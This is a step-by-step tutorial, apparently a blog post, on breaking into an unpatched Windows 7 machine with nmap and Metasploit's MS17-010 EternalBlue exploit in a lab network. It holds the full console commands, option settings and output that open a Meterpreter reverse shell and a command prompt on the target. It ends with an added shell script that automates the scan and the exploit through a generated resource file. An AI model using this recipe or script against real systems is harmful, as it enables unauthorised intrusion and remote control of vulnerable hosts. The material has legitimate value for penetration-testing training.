Breaking into Win7 with Metasploit

1. Scan the PC for vulnerabilities with nmap: nmap --script vuln <target IP>. The vuln category runs every vulnerability-check NSE script; the one that reports the hole used below is smb-vuln-ms17-010, which probes SMB on TCP 445.


2. Use Metasploit to break in

First start postgresql (Metasploit keeps its module cache and host data in it):

root@kali:~# service postgresql start
root@kali:~#

Then run msfconsole to start Metasploit.

The search command looks up modules; use it to find the ones for the MS17-010 hole that nmap just reported:

msf > search ms17-010

Matching Modules

   Name                                           Disclosure Date  Rank
   ----                                           ---------------  ----
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal
   auxiliary/scanner/smb/smb_ms17_010                              normal
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal

Use the third module, the EternalBlue exploit (the scanner module above is the one to run first if you only want to confirm the host is vulnerable without risking a crash):

msf > use exploit/windows/smb/ms17_010_eternalblue
msf >

show payloads lists the payloads compatible with this exploit; the one boxed in red in the screenshot, and used here, is windows/x64/meterpreter/reverse_tcp. It is an x64 payload, so the target must be 64-bit Windows, which the module's VerifyArch option checks before firing.

msf > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

show options lists what still has to be set:

msf > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the ...
   GroomDelta                           yes       The amount to increase the groom coun...
   MaxExploitAttempts                   yes       The number of times to retry the expl...
   ProcessName                          yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain                            no        (Optional) The Windows domain to use ...
   SMBPass                              no        (Optional) The password for the speci...
   SMBUser                              no        (Optional) The username to authentica...
   VerifyArch          true             yes       Check if remote architecture matches ...
   VerifyTarget        true             yes       Check if remote OS matches exploit Ta...

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, proc...
   LHOST                      yes       The listen address (an interface may be specifi...
   LPORT     4444             yes       The listen port

Exploit target: (cut off in the screenshot)

Several Current Setting values and the tail of each description were cut off in the screenshot; every option shown has a default except RHOST and LHOST, which is why only those two are set below.

RHOST is the target machine's IP address; LHOST is the attacking machine's IP address (the address the reverse shell will connect back to, so it must be reachable from the target):

msf > set rhost 192.168.150.3
rhost => 192.168.150.3
msf > set lhost 192.168.150.2
lhost => 192.168.150.2

With those set, run exploit to launch the attack. When the prompt changes from msf > to meterpreter > the intrusion has succeeded:

msf > exploit

[*] Started reverse TCP handler on 192.168.150.2:4444
[*] 192.168.150.3:445 - Connecting to target for exploitation.
[+] 192.168.150.3:445 - Connection established for exploitation.
[+] 192.168.150.3:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.150.3:445 - CORE raw buffer dump (25 bytes)
[*] 192.168.150.3:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70  Windows 7 Enterp
[*] 192.168.150.3:445 - 0x00000010  72 69 73 65 20 37 36 30 30                       rise 7600
[+] 192.168.150.3:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.150.3:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.150.3:445 - Sending all but last fragment of exploit packet
[*] Sending stage (206403 bytes) to 192.168.150.3
[*] Meterpreter session 1 opened (192.168.150.2:4444 -> 192.168.150.3:49159) at 2018-07-26 +0800
[-] 192.168.150.3:445 - RubySMB::Error::CommunicationError: RubySMB::Error::CommunicationError
meterpreter >

The SMB reply identifies the target as Windows 7 Enterprise build 7600 (RTM, no service pack), and the 12 groom allocations are the kernel-pool grooming that makes this exploit "average" rank: a failed attempt can blue-screen the target. The RubySMB::Error::CommunicationError printed after the session opened comes from the SMB connection being torn down once the payload ran; the session itself is usable, as the meterpreter > prompt and the next step show.

Type shell to drop into a Windows command prompt on the target:

meterpreter > shell
Process 2…6 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
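The whole walkthrough can be driven non-interactively. The script below is an added example, not code from the original post: it generates a Metasploit resource script that first runs the scanner module the search listed (auxiliary/scanner/smb/smb_ms17_010) to confirm the host is really vulnerable, and only then runs the EternalBlue exploit with the same payload and options as above. Module, option and payload names are the ones shown in the post; the 192.168.150.x addresses are the post's lab addresses, and the /tmp path, the MS17_RUN switch and the helper names are assumptions of this example.

```shell
#!/bin/sh
# Added example, not part of the original post: drive the nmap check, the
# MS17-010 scanner module and the EternalBlue exploit from one resource script.
# Assumed: the 192.168.150.x lab addresses, /tmp/ms17_010.rc, MS17_RUN.
set -eu

# Accept only a dotted-quad IPv4 address (four octets, each 0-255), so a typo
# can never be written into the resource script as an RHOST/LHOST value.
valid_ipv4() {
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    oldifs=$IFS; IFS=.
    set -- $1
    IFS=$oldifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Print a resource script: confirm the host is vulnerable with the scanner
# module, then fire the kernel-pool exploit exactly as in the walkthrough.
# Usage: make_ms17_010_rc <target-ip> <attacker-ip> [lport]
make_ms17_010_rc() {
    rhost=$1; lhost=$2; lport=${3:-4444}
    valid_ipv4 "$rhost" || { echo "bad RHOST: $rhost" >&2; return 1; }
    valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
    cat <<EOF
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS $rhost
run
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOST $rhost
set LHOST $lhost
set LPORT $lport
exploit
EOF
}

# Run the attack: MS17_RUN=1 sh ms17_010.sh 192.168.150.3 192.168.150.2
# Step 1 of the post narrowed to the NSE script that reports MS17-010, then
# the msfconsole session replayed from the generated resource file.
if [ "${MS17_RUN:-0}" = 1 ]; then
    nmap -p445 --script smb-vuln-ms17-010 "$1"
    make_ms17_010_rc "$1" "$2" > /tmp/ms17_010.rc
    msfconsole -q -r /tmp/ms17_010.rc
fi
```

Running the scanner module before the exploit is the check the manual session skipped: the scanner only sends a crafted SMB transaction and reads the error code, while the exploit grooms the kernel pool and can crash an unpatched but slightly different build. Newer releases of the exploit module name the target option RHOSTS rather than RHOST; confirm with show options on your version before replaying the script.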
